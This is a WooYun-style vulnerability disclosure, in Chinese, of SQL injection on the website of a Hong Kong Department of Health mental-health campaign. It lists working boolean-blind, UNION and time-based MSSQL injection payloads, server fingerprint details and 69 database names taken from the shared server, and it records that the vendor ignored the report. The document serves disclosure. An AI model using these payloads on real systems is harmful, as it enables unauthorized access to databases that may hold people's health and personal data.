好心情@HK官网SQL注入导致同服多个数据库测漏(香港地區)

编号224063
Urlhttp://www.wooyun.org/bug.php?action=view&id=224063
漏洞状态已交由第三方合作机构(hkcert香港互联网应急协调中心)处理
漏洞标题好心情@HK官网SQL注入导致同服多个数据库测漏(香港地區)
漏洞类型SQL注射漏洞
厂商好心情@HK
白帽子路人甲
提交日期2016-06-29 09:24:00
公开日期2016-07-04 09:35:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank16
厂商评级
厂商评rank0
漏洞简介
「好心情@HK」(計劃)是由衞生署於2016年1月推行為期三年的全港性心理健康推廣計劃。
計劃目標:
提高公眾對心理健康推廣的參與,以及
提高公眾對精神健康的知識和了解。
漏洞细节

http://**.**.**.**/sc/event_details.asp?id=3 (GET)

POC

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3 AND 8705=8705
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-7236 UNION ALL SELECT CHAR(113)+CHAR(105)+CHAR(109)+CHAR(122)+CHAR(113)+CHAR(117)+CHAR(90)+CHAR(79)+CHAR(115)+CHAR(80)+CHAR(81)+CHAR(66)+CHAR(113)+CHAR(77)+CHAR(100)+CHAR(113)+CHAR(110)+CHAR(112)+CHAR(107)+CHAR(113),NULL,NULL--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: id=-9410 OR 3743=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft SQL Server 2008
available databases [69]:
[*] 2plus3
[*] [2plus3-dev]
[*] [2plus3-test]
[*] [CHEUeCard-dev]
[*] [CHEUeCard-test]
[*] [CHEUenewsletter-dev]
[*] [CHEUenewsletter-test]
[*] [CHEUGame-dev]
[*] [CHEUGame-test]
[*] [CHEUGeneral-dev]
[*] [CHEUGeneral-test]
[*] [CHEUMembership-dev]
[*] [CHEUMembership-test]
[*] [ESR-dev-live]
[*] [ESR-prod-live]
[*] [ESR-test-live]
[*] [ExerciseRx-dev]
[*] [ExerciseRx-test]
[*] [healthatwork-dev-live]
[*] [healthatwork-prod-live]
[*] [healthatwork-test-live]
[*] [HEG-dev-grp01-svr01]
[*] [HEG-dev-grp01-svr02]
[*] [HEG-dev-grp02-svr01]
[*] [HEG-dev-grp02-svr02]
[*] [HEG-prod-grp01-svr01]
[*] [HEG-prod-grp01-svr02]
[*] [HEG-prod-grp02-svr01]
[*] [HEG-prod-grp02-svr02]
[*] [HEG-test-grp01-svr01]
[*] [HEG-test-grp01-svr02]
[*] [HEG-test-grp02-svr01]
[*] [HEG-test-grp02-svr02]
[*] [HEW-dev-live]
[*] [HEW-prod-live]
[*] [HEW-test-live]
[*] [MiniCHEUGeneral-dev]
[*] [MiniCHEUGeneral-test]
[*] [MiniWeb-dev]
[*] [MiniWeb-test]
[*] [StairClimbing-dev]
[*] [StairClimbing-test]
[*] [StartSmart-dev-live]
[*] [StartSmart-prod-live]
[*] [StartSmart-test-live]
[*] CHEU_HMEFORM_DEV
[*] CHEU_HMEFORM_PROD
[*] CHEU_HMEFORM_UAT
[*] CHEUeCard
[*] CHEUenewsletter
[*] CHEUenewsletter_test
[*] CHEUGame
[*] CHEUGeneral
[*] CHEUMembership
[*] cs_dev_live
[*] cs_prod_live
[*] cs_test_live
[*] ExerciseRx
[*] master
[*] mh_dev_live
[*] mh_dev_live_temp
[*] mh_prod_live
[*] mh_test_live
[*] MiniCHEUGeneral
[*] MiniWeb
[*] model
[*] msdb
[*] StairClimbing
[*] tempdb

修复方案

参数过滤

状态信息 2016-06-29: 细节已通知厂商并且等待厂商处理中
2016-06-29: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-07-04: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复None漏洞Rank:4 (WooYun评价)
回应信息危害等级:无影响厂商忽略忽略时间:2016-07-04 09:35